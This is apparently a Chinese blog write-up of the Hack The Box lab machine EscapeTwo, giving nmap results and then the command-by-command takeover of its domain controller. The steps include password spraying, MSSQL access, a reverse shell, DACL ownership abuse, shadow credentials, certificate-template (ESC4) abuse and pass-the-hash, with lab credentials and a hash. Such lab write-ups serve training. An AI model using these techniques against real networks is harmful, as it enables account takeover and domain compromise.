信息收集

nmap -sV -sC -O 10.10.11.51

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 14:52 CST

Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan

Service scan Timing: About 69.23% done; ETC: 14:54 (0:00:06 remaining)

Nmap scan report for 10.10.11.51

Host is up (0.64s latency).

Not shown: 987 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION

53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 06:34:49Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:44+00:00; -19m04s from scanner time.

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

|_ssl-date: 2025-04-05T06:36:43+00:00; -19m02s from scanner time.

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM

| ms-sql-info:

|   10.10.11.51:1433:

|     Version:

|       name: Microsoft SQL Server 2019 RTM

|       number: 15.00.2000.00

|       Product: Microsoft SQL Server 2019

|       Service pack level: RTM

|       Post-SP patches applied: false

|_    TCP port: 1433

| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback

| Not valid before: 2025-04-04T19:43:03

|_Not valid after:  2055-04-04T19:43:03

|_ssl-date: 2025-04-05T06:36:45+00:00; -19m04s from scanner time.

| ms-sql-ntlm-info:

|   10.10.11.51:1433:

|     Target_Name: SEQUEL

|     NetBIOS_Domain_Name: SEQUEL

|     NetBIOS_Computer_Name: DC01

|     DNS_Domain_Name: sequel.htb

|     DNS_Computer_Name: DC01.sequel.htb

|     DNS_Tree_Name: sequel.htb

|_    Product_Version: 10.0.17763

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:46+00:00; -19m03s from scanner time.

3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)

| ssl-cert: Subject: commonName=DC01.sequel.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb

| Not valid before: 2024-06-08T17:35:00

|_Not valid after:  2025-06-08T17:35:00

|_ssl-date: 2025-04-05T06:36:43+00:00; -19m04s from scanner time.

5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running (JUST GUESSING): Microsoft Windows 2019|10 (91%)

OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10

Aggressive OS guesses: Windows Server 2019 (91%), Microsoft Windows 10 1903 - 21H1 (85%)

No exact OS matches for host (test conditions non-ideal).

Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-time:

|   date: 2025-04-05T06:36:08

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

|_clock-skew: mean: -19m03s, deviation: 1s, median: -19m03s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 189.83 seconds

smb攻击

题目描述给了个账号密码:rose:KxEPkKe6R8su,smbclient连接一下,impacket-smbclient sequel/rose:KxEPkKe6R8su@10.10.11.51



下载excel,010修改一下文件头,504B0304,修复成功打开,拿到用户名密码,做一个密码本

KxEPkKe6R8su

0fwz7Q4mSpurIt99

86LxLBMgEWaKUnBG

Md9Wlq1E5bZnVDVo

MSSQLP@ssw0rd!

用户名怕不全,smb爆一下用户名



做一个用户表

Administrator

Guest

krbtgt

DC01$

michael

ryan

oscar

sql_svc

rose

ca_svc

也可以ldap来收集用户名



大差不差,smb密码喷洒一下



获得新凭证:oscar:86LxLBMgEWaKUnBG,测试winrm连不上,切换思路,之前发现的excel表中有这一组账号密码:sa:MSSQLP@ssw0rd!,nmap也扫出了1433端口有mssql,登录一下,impacket-mssqlclient sequel/sa:'MSSQLP@ssw0rd!'@10.10.11.51



测试发现有128长度限制,那传个nc.exe上去,反连



发现新凭证:sql_svc:WqSZAF6CysDQbGb3,使用这个密码去喷洒一下



获得新凭证:ryan:WqSZAF6CysDQbGb3,winrm连一下



使用bloodhound收集一下域信息,不过首先得同步一下与目标的时间,使用faketime伪造一下



上传到GUI中,直接分析ryan用户的关系网

DACL攻击

ryan用户对ca_svc用户有writeownerer权限,先将ca_svc的所有者修改成ryan

impacket-owneredit -action write -new-owner ryan -target ca_svc -dc-ip 10.10.11.51 sequel/ryan:WqSZAF6CysDQbGb3



在利用dacl将ryan的权限修改成FullControl

impacket-dacledit -action write -rights FullControl -target ca_svc -principal ryan -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysDQbGb3



注意以上两步需要连贯快速的执行,不然第二步可能会失败

Shadow Credentials Attack (ESC4)

ESC4 滥用 Active Directory 帐户的密钥凭据属性,允许攻击者使用基于证书的身份验证绕过以其他用户身份进行身份验证。

通过ca_svc所属用户组Cert Publishersc猜测的攻击思路......正常人能想到吗?此攻击将向 ca_svc 添加恶意密钥凭证,并允许 Ryan 使用证书而不是密码以 ca_svc 的身份进行身份验证,其实就是可以获取ca_svc的NTLM HASH凭证

certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -dc-ip 10.10.11.51



这里注意都要faketime一下,要不然获取TGT会失败,这里找证书漏洞模板

certipy-ad find -u 'ca_svc' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -target 10.10.11.51 -stdout -vulnerable



使用这个模板可以以管理员身份请求dc,先修改一下模板

certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug



再请求Administrator获取证书



使用该证书去请求拿到Administrator的hash

certipy-ad auth -pfx administrator.pfx -ns 10.10.11.51 -debug



winrm登录管理员

evil-winrm -i 10.10.11.51 -u Administrator -H ?????????????

拿到flag

HTB打靶记录-EscapeTwo的更多相关文章

  1. VulnHub-Earth 打靶记录

    目录 VulnHub-Earth 打靶记录 知识点 目标探测 信息收集 Shell反弹&信息二次收集 提权 权限维持 VulnHub-Earth 打靶记录 搭建靶场的时候一定要使用NATser ...

  2. 【HTB系列】靶机Chaos的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...

  3. CSS3中的动画效果记录

    今天要记录的是CSS3中的三种属性transform.transition以及animation,这三个属性大大提升了css处理动画的能力. 一.Transform 变形 CSS中transform ...

  4. 利用jdk中工具完成Java程序监控方法记录

    转载加自己整理的部分内容,转载自:http://jiajun.iteye.com/blog/810150 记录下JConsole使用方法 一.JConsole是什么    从Java 5开始 引入了 ...

  5. 递归计算战士打靶S次打了N环一共同拥有多少种可能的问题

    问题描写叙述 一个战士打了10次靶.一共打了90环,问一共同拥有多少种可能,并输出这些可能的组合. 思路 首先.嵌套10层循环进行穷举是不可取的,一是由于速度太慢,二是假设改成打20次靶就完蛋了. 事 ...

  6. RAR 5.50 控制台使用记录

    copy from  WinRAR用户手册,备忘 用户手册 ~~~~~~~~ RAR 5.50 控制台版本 ~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=- ...

  7. 【HTB系列】靶机Frolic的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...

  8. 打靶笔记-03-vulhub-Moriarty Corp

    打靶笔记-03-vulhub-BoredHackerBlog 一.靶机信息 Name: BoredHackerBlog: Moriarty Corp(中-高级难度) Date release: 29 ...

  9. 打靶笔记-01-vulnhub-moneybox

    打靶笔记-01-vulnhub-moneybox 本篇笔记根据苑老师视频进行学习记录 https://www.bilibili.com/video/BV1Lv411n7Lq/?spm_id_from= ...

  10. webug4.0 打靶笔记-02【完结】

    webug4.0打靶笔记-02 3. 延时注入(时间盲注) 3.1 访问靶场 3.2 寻找注入点 貌似一样的注入点: ?id=1' --+ 3.3 判断输出位置 同前两关一样的位置,时间盲注应该不是这 ...

随机推荐

  1. rabbitmq部署及配置与验证-copy

    1. 场景描述 朋友项目需要弄个测试环境,稍微帮忙了下,系统不复杂,但是需要自己安装mysql.Reids.Es.RabbitMq等,Mq主要用在同步用户信息与发送站内消息和短信上,RabbitMq以 ...

  2. Java一个入门级MVC基于Spring Boot项目

    首先根据上一篇文章内容创建一个Spring Boot项目,如图所示: 一,创建Controller并返回数据 在src/main/java/项目文件夹下面创建package,继续里面可以创建模块的pa ...

  3. LeetCode 未验证规则

    1. for循环容易忘记break,很多提交不过,都是因为这个 2. 左右指针,思考起来比较复杂,但是以代码容易理解.code精简为主,不要在乎省下一两次运算时间 3. 左右指针,有时候以left & ...

  4. WordPress产品导入后内容出现乱码,以及附属一些别的功能

    效果图如下 该插件附带了一个可以把产品描述里面的超链接给去掉,以及有的产品图片点击会在地址栏上面显示图片的路径,在该插件可以进行关闭,并且替换成一个模态窗,还有对产品邮费展示进行了处理,到金额到达包邮 ...

  5. ORACLE存储过程中使用SELECT INOT语句避免NO_DATA_FOUND的方法

    oracle存储过程中使用了类似如下语句,当查询不到记录时,会触发"数据未发现"异常 SELECT col INTO v_col FROM t_table 来自网络的方法 1)使用 ...

  6. uni-app之页面跳转(点击按钮进行页面跳转)

    001==>点击按钮进行页面跳转 <view class="" @tap="gotoLunBo"> 去轮播页 </view> // ...

  7. 载誉而归!天翼云荣获第23届中国IT用户满意度大会多项殊荣

    10月25日,2024第23届中国IT用户满意度大会暨首届工业产品满意度交流会在北京举行.现场揭晓"2024中国IT用户满意度征集结果",天翼云凭借领先的产品技术.完善的客户服务以 ...

  8. [记录点滴] 一个解决Lua 随机数生成问题的办法

    [记录点滴] 一个解决Lua 随机数生成问题的办法 0x00 摘要 本文是开发中的简略记录,具体涉及知识点有:Lua,随机数. 0x01 背景 Lua语言生成随机数需要用到两个函数: math.ran ...

  9. 干货:DeepSeek+SpringAI实现流式对话!

    前面一篇文章我们实现了<炸裂:SpringAI内置DeepSeek啦!>,但是大模型的响应速度通常是很慢的,为了避免用户用户能够耐心等待输出的结果,我们通常会使用流式输出一点点将结果输出给 ...

  10. 解决微信小程序原生云开发退款报错“特约子商户商户号未授权服务商的产品权限”的问题

    背景:微信小程序云开发支付没问题,退款时就会报这个错. 现象: 解决方法流程: 1.打开微信小程序开发者工具上面的云开发界面: 2.进入设置: 3.其他设置: 需要授权退款API权限,我这里已经授权了 ...